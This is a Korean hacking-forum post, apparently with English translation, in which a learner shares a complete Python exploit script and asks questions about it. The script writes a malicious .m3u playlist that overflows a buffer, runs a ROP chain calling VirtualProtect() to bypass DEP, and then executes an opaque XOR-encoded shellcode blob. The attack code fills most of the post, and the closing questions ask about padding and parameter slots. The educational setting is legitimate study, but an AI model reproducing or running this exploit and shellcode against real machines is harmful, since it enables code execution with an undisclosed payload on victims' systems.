Source: http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=25253
ROP를 이용한 DEP 우회, 그리고 ASLR 문서를 보다가 궁금한 게 생겼습니다. (I was reading a document on bypassing DEP with ROP, and on ASLR, and a few things puzzled me.)
------------------ exploit 코드 (exploit code) ---------------------
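# ROP chain that calls VirtualProtect() on the stack and then runs the payload.
#
# Layout of the file written (sizes are taken from the fragments below):
#   BUFFER_SIZE bytes of filler
#   4 bytes   overwrite of the saved return address      (RET_TO_STACK)
#   4 bytes   "AAAA"                                      (see the note at DUMMY2)
#   216 bytes ROP chain, including the 0x20-byte VirtualProtect parameter block
#   240 bytes NOP sled, then SHELLCODE, then 300 bytes of trailing filler
#
# Every gadget below is an absolute address inside a module loaded by the
# author's target (the page does not name the target; only OLEAUT32.dll is
# mentioned in the author's notes).  Hard-coded absolute addresses are only
# valid for the exact module versions the author had loaded, unrebased and
# without ASLR; on any other build, patch level or locale the chain has to be
# regenerated from scratch.  The instruction comments are the author's own;
# where a gadget's behaviour is only implied by the padding around it, the
# comment says so.
#
# The original listing was a Python 2 script whose line continuations had been
# lost in the forum paste (three lines ended in a bare "+"), so it did not
# parse.  This version builds the same bytes, runs on Python 2 and 3, and
# writes the file in binary mode.
import struct

FILENAME = "rop_6.m3u"
BUFFER_SIZE = 26074  # filler bytes before the saved return address is hit

# --- gadgets / pointers (little-endian dwords in the original) ---------------
RET_TO_STACK = 0x100102DC      # "return to stack": goes into the saved return address
PUSH_ESP_POP_EDI = 0x5A489277  # PUSH ESP # POP EDI              -> EDI = stack pointer
PUSH_EDI_POP_EAX = 0x77BCE842  # PUSH EDI # POP EAX              -> EAX = stack pointer;
                               #   the author pads one dword after it "for POP EBP"
ADD_ESP_20 = 0x1001653D        # ADD ESP,20 # RET                -> hop over the 0x20-byte block
VIRTUALPROTECT = 0x7C7D1AD4    # what the chain finally returns into to call VirtualProtect()
WRITABLE_ADDR = 0x10035005     # a writable dword; VirtualProtect stores the old protection here
XCHG_ESI_EDI = 0x7631982F      # XCHG ESI,EDI # DEC ECX # RETN 4 -> ESI = stack pointer
ADD_EAX_100 = 0x1002DC4C       # ADD EAX,100 # POP EBP
MOV_ESI10_EAX = 0x77D94115     # MOV DWORD PTR DS:[ESI+10],EAX   -> writes one parameter slot;
                               #   the author pads one dword after it and then says
                               #   "EAX now contains stack pointer", so the gadget
                               #   presumably also loads EAX from ESI and pops once
PUSH_EAX_POP_ESI = 0x76A6131E  # PUSH EAX # POP ESI # RETN
INC_ESI = 0x77107D1D           # INC ESI # RETN   [OLEAUT32.dll]
XOR_EAX_EAX = 0x100307A9       # XOR EAX,EAX # RETN
ADD_EAX_40 = 0x1002DC41        # ADD EAX,40 # POP EBP
SUB_EAX_4 = 0x76A612F1         # SUB EAX,4 # RET
PUSH_EAX_POP_ESP = 0x73D55858  # PUSH EAX # POP ESP # POP EDI # POP ESI # RETN -> pivot

# Filler dword consumed by a POP or a RETN n inside the gadget that precedes it.
PAD = b"AAAA"

# The 4 bytes between the overwritten return address and the first gadget.
# The author does not explain them (it is the poster's question 1 below).  For
# execution to reach PUSH_ESP_POP_EDI something has to consume this dword, e.g.
# a RETN 4 in the vulnerable function's epilogue or in the RET_TO_STACK
# gadget; which one it is cannot be told from this listing -- confirm in a
# debugger before relying on it.
DUMMY2 = b"AAAA"

# Opaque payload supplied by the author.  Its first instructions (mov edx,imm32;
# fnstenv / pop esi; mov cl,0x32; xor [esi+0x12],edx; add esi,4 ...) look like
# a self-decoding XOR stub, i.e. it rewrites itself in place -- which is why
# the chain asks for PAGE_EXECUTE_READWRITE (0x40) rather than execute-only.
# What the decoded payload does is not determinable from this page; never run
# it outside an isolated lab VM.
SHELLCODE = (
    b"\xba\x46\xd1\x59\x1e\xda\xc6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
    b"\x32\x31\x56\x12\x83\xc6\x04\x03\x10\xdf\xbb\xeb\x60\x37\xb2"
    b"\x14\x98\xc8\xa5\x9d\x7d\xf9\xf7\xfa\xf6\xa8\xc7\x89\x5a\x41"
    b"\xa3\xdc\x4e\xd2\xc1\xc8\x61\x53\x6f\x2f\x4c\x64\x41\xef\x02"
    b"\xa6\xc3\x93\x58\xfb\x23\xad\x93\x0e\x25\xea\xc9\xe1\x77\xa3"
    b"\x86\x50\x68\xc0\xda\x68\x89\x06\x51\xd0\xf1\x23\xa5\xa5\x4b"
    b"\x2d\xf5\x16\xc7\x65\xed\x1d\x8f\x55\x0c\xf1\xd3\xaa\x47\x7e"
    b"\x27\x58\x56\x56\x79\xa1\x69\x96\xd6\x9c\x46\x1b\x26\xd8\x60"
    b"\xc4\x5d\x12\x93\x79\x66\xe1\xee\xa5\xe3\xf4\x48\x2d\x53\xdd"
    b"\x69\xe2\x02\x96\x65\x4f\x40\xf0\x69\x4e\x85\x8a\x95\xdb\x28"
    b"\x5d\x1c\x9f\x0e\x79\x45\x7b\x2e\xd8\x23\x2a\x4f\x3a\x8b\x93"
    b"\xf5\x30\x39\xc7\x8c\x1a\x57\x16\x1c\x21\x1e\x18\x1e\x2a\x30"
    b"\x71\x2f\xa1\xdf\x06\xb0\x60\xa4\xf9\xfa\x29\x8c\x91\xa2\xbb"
    b"\x8d\xff\x54\x16\xd1\xf9\xd6\x93\xa9\xfd\xc7\xd1\xac\xba\x4f"
    b"\x09\xdc\xd3\x25\x2d\x73\xd3\x6f\x4e\x12\x47\xf3\x91"
)


def p32(value):
    """Pack *value* as a little-endian 32-bit dword, i.e. one x86 stack slot."""
    return struct.pack("<I", value)


def _virtualprotect_block():
    """Return the 0x20-byte block the chain pivots ESP onto before VirtualProtect().

    Slot 0 is popped by the pivot gadget's final RETN.  Slots 1-5 are the
    stack exactly as VirtualProtect(lpAddress, dwSize, flNewProtect,
    lpflOldProtect) sees it: slot 1 is the address it returns to, slots 2-5
    its four arguments.  Slots 1-4 are placeholders that the chain overwrites
    at run time through MOV [ESI+10],EAX; slot 5 and the 8-byte tail are used
    as they are.

    Raises ValueError if the block is not exactly 0x20 bytes, because
    ADD_ESP_20 skips exactly that much and anything else desynchronises the
    chain.
    """
    block = b"".join([
        p32(VIRTUALPROTECT),  # slot 0: popped by the final RETN -> VirtualProtect()
        b"WWWW",              # slot 1: return address, patched to stack ptr + 0x100 (NOP sled)
        b"XXXX",              # slot 2: lpAddress, patched to the same stack ptr + 0x100
        b"YYYY",              # slot 3: dwSize, patched to 0x300
        b"ZZZZ",              # slot 4: flNewProtect, patched to 0x40 (PAGE_EXECUTE_READWRITE)
        p32(WRITABLE_ADDR),   # slot 5: lpflOldProtect -- must be writable, never patched
        b"H" * 8,             # padding
    ])
    if len(block) != 0x20:
        raise ValueError(
            "VirtualProtect block is %d bytes; ADD ESP,20 skips exactly 32" % len(block)
        )
    return block


def build_payload():
    """Assemble the complete .m3u payload and return it as bytes (no I/O).

    Byte offsets of the result, for anyone checking it in a debugger:
      0      filler ("Z" * BUFFER_SIZE)
      26074  RET_TO_STACK, then DUMMY2
      26082  stage 1 (16 bytes), 26098 VirtualProtect block (32 bytes)
      26130  stages 2-6 (24 + 36 + 56 + 40 + 12 bytes)
      26298  NOP sled (240), 26538 SHELLCODE, then "C" * 300
    """
    # Stage 1: capture the stack pointer in EDI and EAX, then hop over the
    # parameter block so the chain can continue after it.  The stack pointer
    # captured here points at the PUSH_EDI_POP_EAX slot; +0x10 from there is
    # slot 1 of the block, which is why the writes below use [ESI+10].
    stage1 = [
        p32(PUSH_ESP_POP_EDI),
        p32(PUSH_EDI_POP_EAX),
        PAD,                   # "dummy for POP EBP" (author)
        p32(ADD_ESP_20),       # ... # RET lands on stage 2
    ]
    params = _virtualprotect_block()

    # Stage 2: ESI = stack pointer (XCHG with EDI), EAX = stack pointer + 0x100
    # (44 bytes into the NOP sled by the sizes above), store EAX into slot 1
    # (VirtualProtect's return address).  Note the order: the XCHG gadget's
    # RETN 4 returns into ADD_EAX_100 and *then* skips one pad dword.
    stage2 = [
        p32(XCHG_ESI_EDI),
        p32(ADD_EAX_100),
        PAD,                   # skipped by RETN 4 (author: "padding for RETN4")
        PAD,                   # eaten by ADD EAX,100's POP EBP
        p32(MOV_ESI10_EAX),
        PAD,                   # author's padding after the store
    ]

    # Stage 3: ESI = EAX (the stack pointer again, per the author's note),
    # EAX = stack pointer + 0x100 again, ESI += 4, store -> slot 2 (lpAddress).
    stage3 = (
        [p32(PUSH_EAX_POP_ESI), p32(ADD_EAX_100), PAD]
        + [p32(INC_ESI)] * 4
        + [p32(MOV_ESI10_EAX), PAD]
    )

    # Stage 4: EAX = 0 + 3 * 0x100 = 0x300, ESI += 4, store -> slot 3 (dwSize).
    stage4 = (
        [p32(PUSH_EAX_POP_ESI), p32(XOR_EAX_EAX)]
        + [p32(ADD_EAX_100), PAD] * 3
        + [p32(INC_ESI)] * 4
        + [p32(MOV_ESI10_EAX), PAD]
    )

    # Stage 5: EAX = 0x40, ESI += 4, store -> slot 4 (flNewProtect).
    stage5 = (
        [p32(PUSH_EAX_POP_ESI), p32(XOR_EAX_EAX), p32(ADD_EAX_40), PAD]
        + [p32(INC_ESI)] * 4
        + [p32(MOV_ESI10_EAX), PAD]
    )

    # Stage 6: EAX now points at slot 0 ("just before parameters").  Back it
    # up 8 bytes to compensate for the pivot gadget's two POPs, then
    # PUSH EAX / POP ESP so its RETN pops slot 0 and calls VirtualProtect()
    # with slots 1-5 as its frame.
    stage6 = [p32(SUB_EAX_4)] * 2 + [p32(PUSH_EAX_POP_ESP)]

    chain = (
        b"".join(stage1)
        + params
        + b"".join(stage2 + stage3 + stage4 + stage5 + stage6)
    )
    return (
        b"Z" * BUFFER_SIZE
        + p32(RET_TO_STACK)
        + DUMMY2
        + chain
        + b"\x90" * 240
        + SHELLCODE
        + b"C" * 300
    )


def main():
    """Build the payload, print its size and write it to FILENAME."""
    payload = build_payload()
    print("Payload size :  %d" % len(payload))
    # Binary mode: in text mode on Windows a 0x0a inside the payload would be
    # rewritten as 0x0d 0x0a and shift every offset after it.
    with open(FILENAME, "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    main()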
---------------- DEP를 우회하는 전체 exploit 코드 (full exploit code that bypasses DEP) ----------------------
이 exploit에서 궁금한 점이 있습니다. (I have some questions about this exploit.)
1. dummy2 = "AAAA" 이 부분은 왜 구해주는 건가요?? (Why is this part put in??)
eip가 리턴하고 나서 4바이트를 사용하는데 이 값을 AAAA로 채워주는 건가요? (Is it that 4 bytes get used up after EIP returns, so that slot is filled with AAAA?)
2.params_writeable = "\x05\x50\x03\x10" #writable address
프로그램 내에서 실행 가능한 주소? 라는 게 어떤 걸 말하는 건가요? (What does "an executable address inside the program?" refer to?)
3.params_dummy = "H"*8 #padding
이건 뭘 뜻하는 건가요? (What does this mean?)
4.params_ret = "WWWW" #return address (param1)
params_addr = "XXXX" #lpAddress (param2)
params_size = "YYYY" #size (param3)
params_protect = "ZZZZ" #flNewProtect (param4)
이건 그냥 VirtualProtect()를 사용해서 DEP를 우회하려 할 때 이렇게 써주면 되는 건가요?? (When bypassing DEP with just VirtualProtect(), is it enough to write it like this??)
5.rop2_dummy = "AAAA" #padding for RETN4
rop2_dummy2 = "AAAA"
이런 식으로 계속 dummy 값이 있는데, 있는 이유는 1번 질문과 마찬가지로 리턴하고 난 후 4바이트를 채워주기 위함인가요? (There are dummy values like this all the way through — are they there for the same reason as in question 1, to fill the 4 bytes after the return?)
6.rop5_dummy = "AAAA" #padding
이것도 1번 질문과 마찬가지인지... (Is this the same as question 1 as well...)
질문이 너무 많네요.. ㅠㅠ (Sorry for so many questions..)
꼭 답해주셨으면 좋겠습니다! (I would really appreciate an answer!)
좋은 하루 보내세요 :) (Have a good day :))